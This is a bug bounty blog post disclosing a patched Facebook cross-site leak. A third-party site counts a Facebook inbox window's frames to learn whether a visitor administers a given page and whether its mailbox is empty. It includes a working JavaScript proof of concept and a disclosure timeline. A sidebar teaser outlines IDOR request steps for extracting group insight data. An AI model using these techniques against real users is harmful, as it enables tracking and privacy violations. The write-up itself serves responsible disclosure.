[XSLeaks] Tracking User with Page Admin/Editor/Moderator roles on Third Party Website

I was reading this blog about XSLeaks issue in facebook which using window.length to return a number of frames inside the document and use it to extract data from facebook user who visit the Third Party website.

So, i start to find the same issue in facebook and i found the same thing in https://web.facebook.com/[page_username]/inbox. You can check if the endpoint has the same issue by typing frames.length in the browser console, in my case it return 3 and This endpoint is only accessible by user which has admin/editor/moderator role. So, if user with no role or had different role besides admin, editor and moderator, it will display a 404 page and the 404 page has 0 frames.length.

The reason why the frames.length return a value of 3 is because my page mailbox is not empty and will return 1 if the mailbox is empty (and your a page admin). Using this lovely behaviour i can track if the page admin A is visiting my website.

So here is the javascript :
<script>
page = "Your Page Username"

if (fb === undefined) {
    var fb = window.open() // Creating window reference
}
 
fb.location = 'https://web.facebook.com/'+page+'/inbox/' // Change the window location
setTimeout(function ()
{
var answer = fb.frames.length == 0 ? 'No' : 'Yes'
var mb = fb.frames.length > 1 ? 'No' : 'Yes'
console.log('Are you an Admin/Editor/Moderator in : ' + page + ' ? -- ' + answer+' Mailbox Empty ? -- '+mb)
fb.close() },5000)
</script>

and the video :
Timeline :

20-05-2019 : Initial Report
23-05-2019 : Pre-Triaged
30-05-2019 : Triaged
11-06-2019 : Fixed
21-06-2019 : Bounty Awarded ($750)

Comments

Post a Comment

Popular posts from this blog

Disclose the Facebook Learning Unit Group Insight

Image
There is an IDOR issue in a feature called learning unit which lead to disclose the Group Insight. If the targeted group privacy is public, then attacker can disclose the group insight without become a member and for closed/secret group privacy, attacker need to become a member. Steps : 1. Request POST /groups/learning/edit_units_dialog/submit/ ..... group_id=Attacker_Group&description=&unit_ids[0]=Victim_Unit_ID Response : for (;;);{"__ar":1,"payload":null,"jsmods":{"require":[["ServerRedirect","reloadPage",[],[]]]},... Victim unit should appear in attacker group. 2. Attacker go to his group > group insight and request a download to download the group insight data (.csv format) and wait until notification from facebook that his data is ready to be download. 3. From the browser, open a new tab and go to https://www.facebook.com/groups/Attacker_group_ID/completions_export/ 4. The .csv file includi
Read more

Cara Membuat Kertas Penghantar Listrik Dengan Conductive Ink

Image
Cara Membuat Kertas Penghantar Listrik Dengan  Conductive Ink Kali ini ane bakalan nge-share cara membuat kertas penghantar listrik dengan  conductive ink  atau tinta konduktif.  "Kertas penghantar listrik ? pasti mahal yah ngebuatnya ?"  ga mahal kok gan bahkan barang-barangnya bisa agan dapat di dekat rumah agan atau mungkin ada di depan agan sendiri.  "Wah masa sih ?"  daripada kebanyakan nanya :v, nih tutorial pembuatan tinta konduktif. Siapkan Alat & Bahan Bahan : 1. Tinta hitam atau Cat hitam (cat air yang biasa dipake kalo menggambar) 2. Lem cair (Bukan Ehabond yah JANGAN!) 3. Arang (Ane saranin arang dari sisa pembakaran kayu, kalo dari tempurung ato yang lain ane belum pernah coba) Alat : 1. Blender 2. Suntik penyedot Gimana ? gak susah kan nyari bahan-bahannya ? dalam tutorial ini arang merupakan komponen utama, karena arang mengandung carbon yang membuat benda hitam imut ini menjadi konduktor yang bagus. Tapi tidak semua arang adalah konduktor
Read more